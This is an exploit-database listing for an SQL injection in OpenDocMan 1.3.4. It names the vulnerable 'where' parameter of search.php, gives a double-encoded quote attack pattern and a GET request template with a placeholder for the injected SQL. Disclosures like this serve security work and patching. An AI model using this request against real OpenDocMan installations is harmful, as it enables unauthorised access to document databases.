[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

OpenDocMan 1.3.4 - (search.php where) SQL Injection Vulnerability

Author
Mehmet EMIROGLU
Risk
[
Security Risk High
]
0day-ID
0day-ID-32310
Category
web applications
Date add
05-03-2019
Platform
php
===========================================================================================
# Exploit Title: OpenDocMan 1.3.4 - ’where’ SQL Injection
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/opendocman/files/
# Software Link: https://sourceforge.net/projects/opendocman/files/
# Version: v1.3.4
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: OpenDocMan is a web based document management
system (DMS) written in PHP designed
  to comply with ISO 17025 and OIE standard for document management.
  It features fine grained control of access to files, and automated
install and upgrades.
===========================================================================================
# POC - SQLi
# Parameters : where
# Attack Pattern : %2527
# GET Request :
http://localhost/opendocman/search.php?submit=submit&sort_by=id&where=[SQL Inject Here]&sort_order=asc&keyword=Training Manual&exact_phrase=on
===========================================================================================

#  0day.today [2024-11-15]  #